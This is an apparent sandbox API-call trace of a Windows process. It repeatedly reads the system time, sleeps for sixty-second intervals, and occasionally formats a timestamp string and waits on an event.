	[0234.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x738b16e0, dwHighDateTime=0x1d50a6a)) 
	[0234.382] Sleep (dwMilliseconds=0xea60) 
	[0234.391] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x738d7840, dwHighDateTime=0x1d50a6a)) 
	[0234.391] Sleep (dwMilliseconds=0xea60) 
	[0234.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x738fd9a0, dwHighDateTime=0x1d50a6a)) 
	[0234.406] Sleep (dwMilliseconds=0xea60) 
	[0234.422] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73923b00, dwHighDateTime=0x1d50a6a)) 
	[0234.422] Sleep (dwMilliseconds=0xea60) 
	[0234.437] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73949c60, dwHighDateTime=0x1d50a6a)) 
	[0234.437] Sleep (dwMilliseconds=0xea60) 
	[0234.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7396fdc0, dwHighDateTime=0x1d50a6a)) 
	[0234.456] Sleep (dwMilliseconds=0xea60) 
	[0234.469] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73995f20, dwHighDateTime=0x1d50a6a)) 
	[0234.469] Sleep (dwMilliseconds=0xea60) 
	[0234.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x739bc080, dwHighDateTime=0x1d50a6a)) 
	[0234.485] Sleep (dwMilliseconds=0xea60) 
	[0234.501] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x739e21e0, dwHighDateTime=0x1d50a6a)) 
	[0234.501] Sleep (dwMilliseconds=0xea60) 
	[0234.548] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73a54600, dwHighDateTime=0x1d50a6a)) 
	[0234.548] Sleep (dwMilliseconds=0xea60) 
	[0234.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73a7a760, dwHighDateTime=0x1d50a6a)) 
	[0234.576] Sleep (dwMilliseconds=0xea60) 
	[0234.578] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73aa08c0, dwHighDateTime=0x1d50a6a)) 
	[0234.578] Sleep (dwMilliseconds=0xea60) 
	[0234.593] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73ac6a20, dwHighDateTime=0x1d50a6a)) 
	[0234.594] Sleep (dwMilliseconds=0xea60) 
	[0234.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73aecb80, dwHighDateTime=0x1d50a6a)) 
	[0234.609] Sleep (dwMilliseconds=0xea60) 
	[0234.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73b12ce0, dwHighDateTime=0x1d50a6a)) 
	[0234.625] Sleep (dwMilliseconds=0xea60) 
	[0234.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73b38e40, dwHighDateTime=0x1d50a6a)) 
	[0234.640] Sleep (dwMilliseconds=0xea60) 
	[0234.656] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73b5efa0, dwHighDateTime=0x1d50a6a)) 
	[0234.656] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557871709\r\n") returned 12
	[0234.656] ResetEvent (hEvent=0xc) returned 1
	[0234.656] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0234.657] Sleep (dwMilliseconds=0xea60) 
	[0234.671] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73b85100, dwHighDateTime=0x1d50a6a)) 
	[0234.671] Sleep (dwMilliseconds=0xea60) 
	[0234.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73bab260, dwHighDateTime=0x1d50a6a)) 
	[0234.687] Sleep (dwMilliseconds=0xea60) 
	[0234.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73bd13c0, dwHighDateTime=0x1d50a6a)) 
	[0234.703] Sleep (dwMilliseconds=0xea60) 
	[0234.718] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73bf7520, dwHighDateTime=0x1d50a6a)) 
	[0234.718] Sleep (dwMilliseconds=0xea60) 
	[0234.749] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73c1d680, dwHighDateTime=0x1d50a6a)) 
	[0234.749] Sleep (dwMilliseconds=0xea60) 
	[0234.749] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73c437e0, dwHighDateTime=0x1d50a6a)) 
	[0234.749] Sleep (dwMilliseconds=0xea60) 
	[0234.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73c69940, dwHighDateTime=0x1d50a6a)) 
	[0234.776] Sleep (dwMilliseconds=0xea60) 
	[0234.783] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73c8faa0, dwHighDateTime=0x1d50a6a)) 
	[0234.783] Sleep (dwMilliseconds=0xea60) 
	[0234.818] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73cdbd60, dwHighDateTime=0x1d50a6a)) 
	[0234.818] Sleep (dwMilliseconds=0xea60) 
	[0234.827] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73d01ec0, dwHighDateTime=0x1d50a6a)) 
	[0234.827] Sleep (dwMilliseconds=0xea60) 
	[0234.847] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73d28020, dwHighDateTime=0x1d50a6a)) 
	[0234.847] Sleep (dwMilliseconds=0xea60) 
	[0234.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73d4e180, dwHighDateTime=0x1d50a6a)) 
	[0234.859] Sleep (dwMilliseconds=0xea60) 
	[0234.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73d742e0, dwHighDateTime=0x1d50a6a)) 
	[0234.874] Sleep (dwMilliseconds=0xea60) 
	[0234.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73d9a440, dwHighDateTime=0x1d50a6a)) 
	[0234.890] Sleep (dwMilliseconds=0xea60) 
	[0234.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73dc05a0, dwHighDateTime=0x1d50a6a)) 
	[0234.906] Sleep (dwMilliseconds=0xea60) 
	[0234.921] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73de6700, dwHighDateTime=0x1d50a6a)) 
	[0234.921] Sleep (dwMilliseconds=0xea60) 
	[0234.946] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73e0c860, dwHighDateTime=0x1d50a6a)) 
	[0234.946] Sleep (dwMilliseconds=0xea60) 
	[0234.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73e329c0, dwHighDateTime=0x1d50a6a)) 
	[0234.953] Sleep (dwMilliseconds=0xea60) 
	[0234.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73e58b20, dwHighDateTime=0x1d50a6a)) 
	[0234.968] Sleep (dwMilliseconds=0xea60) 
	[0234.984] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73e7ec80, dwHighDateTime=0x1d50a6a)) 
	[0234.984] Sleep (dwMilliseconds=0xea60) 
	[0234.999] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73ea4de0, dwHighDateTime=0x1d50a6a)) 
	[0234.999] Sleep (dwMilliseconds=0xea60) 
	[0235.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73ecaf40, dwHighDateTime=0x1d50a6a)) 
	[0235.015] Sleep (dwMilliseconds=0xea60) 
	[0235.030] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73ef10a0, dwHighDateTime=0x1d50a6a)) 
	[0235.030] Sleep (dwMilliseconds=0xea60) 
	[0235.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73f17200, dwHighDateTime=0x1d50a6a)) 
	[0235.048] Sleep (dwMilliseconds=0xea60) 
	[0235.061] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73f3d360, dwHighDateTime=0x1d50a6a)) 
	[0235.062] Sleep (dwMilliseconds=0xea60) 
	[0235.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73f89620, dwHighDateTime=0x1d50a6a)) 
	[0235.094] Sleep (dwMilliseconds=0xea60) 
	[0235.109] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73faf780, dwHighDateTime=0x1d50a6a)) 
	[0235.109] Sleep (dwMilliseconds=0xea60) 
	[0235.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73fd58e0, dwHighDateTime=0x1d50a6a)) 
	[0235.124] Sleep (dwMilliseconds=0xea60) 
	[0235.140] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x73ffba40, dwHighDateTime=0x1d50a6a)) 
	[0235.140] Sleep (dwMilliseconds=0xea60) 
	[0235.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74021ba0, dwHighDateTime=0x1d50a6a)) 
	[0235.156] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557873510\r\n") returned 12
	[0235.156] ResetEvent (hEvent=0xc) returned 1
	[0235.156] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0235.187] Sleep (dwMilliseconds=0xea60) 
	[0235.202] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74093fc0, dwHighDateTime=0x1d50a6a)) 
	[0235.202] Sleep (dwMilliseconds=0xea60) 
	[0235.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x740ba120, dwHighDateTime=0x1d50a6a)) 
	[0235.217] Sleep (dwMilliseconds=0xea60) 
	[0235.255] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x741063e0, dwHighDateTime=0x1d50a6a)) 
	[0235.255] Sleep (dwMilliseconds=0xea60) 
	[0235.264] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7412c540, dwHighDateTime=0x1d50a6a)) 
	[0235.264] Sleep (dwMilliseconds=0xea60) 
	[0235.280] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x741526a0, dwHighDateTime=0x1d50a6a)) 
	[0235.280] Sleep (dwMilliseconds=0xea60) 
	[0235.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74178800, dwHighDateTime=0x1d50a6a)) 
	[0235.295] Sleep (dwMilliseconds=0xea60) 
	[0235.316] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7419e960, dwHighDateTime=0x1d50a6a)) 
	[0235.316] Sleep (dwMilliseconds=0xea60) 
	[0235.327] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x741c4ac0, dwHighDateTime=0x1d50a6a)) 
	[0235.327] Sleep (dwMilliseconds=0xea60) 
	[0235.342] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x741eac20, dwHighDateTime=0x1d50a6a)) 
	[0235.342] Sleep (dwMilliseconds=0xea60) 
	[0235.358] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74210d80, dwHighDateTime=0x1d50a6a)) 
	[0235.358] Sleep (dwMilliseconds=0xea60) 
	[0235.373] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74236ee0, dwHighDateTime=0x1d50a6a)) 
	[0235.373] Sleep (dwMilliseconds=0xea60) 
	[0235.389] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7425d040, dwHighDateTime=0x1d50a6a)) 
	[0235.389] Sleep (dwMilliseconds=0xea60) 
	[0235.405] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x742831a0, dwHighDateTime=0x1d50a6a)) 
	[0235.405] Sleep (dwMilliseconds=0xea60) 
	[0235.420] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x742a9300, dwHighDateTime=0x1d50a6a)) 
	[0235.420] Sleep (dwMilliseconds=0xea60) 
	[0235.443] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x742cf460, dwHighDateTime=0x1d50a6a)) 
	[0235.443] Sleep (dwMilliseconds=0xea60) 
	[0235.452] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x742f55c0, dwHighDateTime=0x1d50a6a)) 
	[0235.452] Sleep (dwMilliseconds=0xea60) 
	[0235.467] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7431b720, dwHighDateTime=0x1d50a6a)) 
	[0235.467] Sleep (dwMilliseconds=0xea60) 
	[0235.482] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74341880, dwHighDateTime=0x1d50a6a)) 
	[0235.482] Sleep (dwMilliseconds=0xea60) 
	[0235.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x743679e0, dwHighDateTime=0x1d50a6a)) 
	[0235.498] Sleep (dwMilliseconds=0xea60) 
	[0235.514] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7438db40, dwHighDateTime=0x1d50a6a)) 
	[0235.514] Sleep (dwMilliseconds=0xea60) 
	[0235.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x743b3ca0, dwHighDateTime=0x1d50a6a)) 
	[0235.530] Sleep (dwMilliseconds=0xea60) 
	[0235.545] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x743d9e00, dwHighDateTime=0x1d50a6a)) 
	[0235.545] Sleep (dwMilliseconds=0xea60) 
	[0235.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x743fff60, dwHighDateTime=0x1d50a6a)) 
	[0235.560] Sleep (dwMilliseconds=0xea60) 
	[0235.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x744260c0, dwHighDateTime=0x1d50a6a)) 
	[0235.576] Sleep (dwMilliseconds=0xea60) 
	[0235.592] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7444c220, dwHighDateTime=0x1d50a6a)) 
	[0235.592] Sleep (dwMilliseconds=0xea60) 
	[0235.607] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74472380, dwHighDateTime=0x1d50a6a)) 
	[0235.608] Sleep (dwMilliseconds=0xea60) 
	[0235.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x744984e0, dwHighDateTime=0x1d50a6a)) 
	[0235.623] Sleep (dwMilliseconds=0xea60) 
	[0235.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x744be640, dwHighDateTime=0x1d50a6a)) 
	[0235.640] Sleep (dwMilliseconds=0xea60) 
	[0236.003] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x745ef140, dwHighDateTime=0x1d50a6a)) 
	[0236.003] Sleep (dwMilliseconds=0xea60) 
	[0236.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x746152a0, dwHighDateTime=0x1d50a6a)) 
	[0236.014] Sleep (dwMilliseconds=0xea60) 
	[0236.029] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7463b400, dwHighDateTime=0x1d50a6a)) 
	[0236.029] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557875370\r\n") returned 12
	[0236.029] ResetEvent (hEvent=0xc) returned 1
	[0236.029] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0236.046] Sleep (dwMilliseconds=0xea60) 
	[0236.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x746876c0, dwHighDateTime=0x1d50a6a)) 
	[0236.060] Sleep (dwMilliseconds=0xea60) 
	[0236.077] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x746ad820, dwHighDateTime=0x1d50a6a)) 
	[0236.077] Sleep (dwMilliseconds=0xea60) 
	[0236.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x746d3980, dwHighDateTime=0x1d50a6a)) 
	[0236.091] Sleep (dwMilliseconds=0xea60) 
	[0236.106] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x746f9ae0, dwHighDateTime=0x1d50a6a)) 
	[0236.106] Sleep (dwMilliseconds=0xea60) 
	[0236.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7471fc40, dwHighDateTime=0x1d50a6a)) 
	[0236.122] Sleep (dwMilliseconds=0xea60) 
	[0236.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74745da0, dwHighDateTime=0x1d50a6a)) 
	[0236.138] Sleep (dwMilliseconds=0xea60) 
	[0236.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7476bf00, dwHighDateTime=0x1d50a6a)) 
	[0236.156] Sleep (dwMilliseconds=0xea60) 
	[0236.194] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x747b81c0, dwHighDateTime=0x1d50a6a)) 
	[0236.194] Sleep (dwMilliseconds=0xea60) 
	[0236.227] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74804480, dwHighDateTime=0x1d50a6a)) 
	[0236.228] Sleep (dwMilliseconds=0xea60) 
	[0236.267] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x748768a0, dwHighDateTime=0x1d50a6a)) 
	[0236.267] Sleep (dwMilliseconds=0xea60) 
	[0236.278] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7489ca00, dwHighDateTime=0x1d50a6a)) 
	[0236.278] Sleep (dwMilliseconds=0xea60) 
	[0236.294] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x748c2b60, dwHighDateTime=0x1d50a6a)) 
	[0236.294] Sleep (dwMilliseconds=0xea60) 
	[0236.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x748e8cc0, dwHighDateTime=0x1d50a6a)) 
	[0236.309] Sleep (dwMilliseconds=0xea60) 
	[0236.325] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7490ee20, dwHighDateTime=0x1d50a6a)) 
	[0236.325] Sleep (dwMilliseconds=0xea60) 
	[0236.341] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74934f80, dwHighDateTime=0x1d50a6a)) 
	[0236.341] Sleep (dwMilliseconds=0xea60) 
	[0236.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7495b0e0, dwHighDateTime=0x1d50a6a)) 
	[0236.356] Sleep (dwMilliseconds=0xea60) 
	[0236.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74981240, dwHighDateTime=0x1d50a6a)) 
	[0236.383] Sleep (dwMilliseconds=0xea60) 
	[0236.387] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x749a73a0, dwHighDateTime=0x1d50a6a)) 
	[0236.387] Sleep (dwMilliseconds=0xea60) 
	[0236.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x749cd500, dwHighDateTime=0x1d50a6a)) 
	[0236.403] Sleep (dwMilliseconds=0xea60) 
	[0236.418] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x749f3660, dwHighDateTime=0x1d50a6a)) 
	[0236.418] Sleep (dwMilliseconds=0xea60) 
	[0236.435] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74a197c0, dwHighDateTime=0x1d50a6a)) 
	[0236.435] Sleep (dwMilliseconds=0xea60) 
	[0236.450] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74a3f920, dwHighDateTime=0x1d50a6a)) 
	[0236.450] Sleep (dwMilliseconds=0xea60) 
	[0236.466] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74a65a80, dwHighDateTime=0x1d50a6a)) 
	[0236.466] Sleep (dwMilliseconds=0xea60) 
	[0236.482] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74a8bbe0, dwHighDateTime=0x1d50a6a)) 
	[0236.482] Sleep (dwMilliseconds=0xea60) 
	[0236.497] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74ab1d40, dwHighDateTime=0x1d50a6a)) 
	[0236.497] Sleep (dwMilliseconds=0xea60) 
	[0236.512] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74ad7ea0, dwHighDateTime=0x1d50a6a)) 
	[0236.512] Sleep (dwMilliseconds=0xea60) 
